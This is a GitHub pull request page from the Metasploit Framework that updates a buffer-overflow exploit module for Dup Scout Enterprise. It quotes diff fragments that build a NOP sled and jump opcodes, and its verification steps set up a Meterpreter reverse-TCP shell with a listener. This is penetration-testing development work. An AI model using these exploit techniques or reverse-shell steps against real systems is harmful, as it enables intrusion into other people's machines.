Updated Dup Scout Documentation and Module Based on Vuln Analysis #9478
Conversation
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
jrobles-r7
changed the title
jrobles-r7
changed the title
acammack-r7
reviewed
Jan 31, 2018
|
|
||
| buffer = "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<classify\nname=\'" | ||
| buffer << "\x90" * 1560 | ||
| buffer << nops[0,1560] |
There was a problem hiding this comment.
I would just call make_nops for the size we need in all these cases since slicing into the nop stream is not guaranteed to be safe.
There was a problem hiding this comment.
Lol, we discussed this on Slack yesterday.
wvu
reviewed
Jan 31, 2018
| esp = "\x8D\x44\x24\x4C" # LEA EAX, [ESP+76] | ||
| jmp = "\xFF\xE0" # JMP ESP | ||
| jmp = "\xFF\xE0" # JMP EAX |
Update the documentation based on analysis of the vulnerability. Slight modifications to the exploit module as well to reduce the size of the generated file and reduce bad characters.
jrobles-r7
changed the title
|
I fixed the changes here @wvu-r7 . |
|
I need to update the headings for this documentation too... |
|
LGTM, thanks @jrobles-r7 |
busterb
added a commit
that referenced
this pull request
Feb 8, 2018
jmartin-tech
pushed a commit
to jmartin-tech/metasploit-framework
that referenced
this pull request
Feb 8, 2018
Release NotesThe exploits/windows/fileformat/dupscout_xml module no longer considers as many characters unusable, so there are more options for generating payloads. The module has also been streamlined to generate smaller payloads. |
This pull request was closed.
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Add this suggestion to a batch that can be applied as a single commit.
This suggestion is invalid because no changes were made to the code.
Suggestions cannot be applied while the pull request is closed.
Suggestions cannot be applied while viewing a subset of changes.
Only one suggestion per line can be applied in a batch.
Add this suggestion to a batch that can be applied as a single commit.
Applying suggestions on deleted lines is not supported.
You must change the existing code in this line in order to create a valid suggestion.
Outdated suggestions cannot be applied.
This suggestion has been applied or marked resolved.
Suggestions cannot be applied from pending reviews.
Suggestions cannot be applied on multi-line comments.
Suggestions cannot be applied while the pull request is queued to merge.
Suggestion cannot be applied right now. Please check back later.
This PR updates the Dup Scout Enterprise v10.4.16 buffer overflow exploit module.
Verification
List the steps needed to make sure this thing works
./msfconsoleuse exploit/windows/fileformat/dupscout_xmlset payload windows/meterpreter/reverse_tcpset lhost <lhost>runuse exploit/multi/handlerset payload windows/meterpreter/reverse_tcpset lhost <lhost>run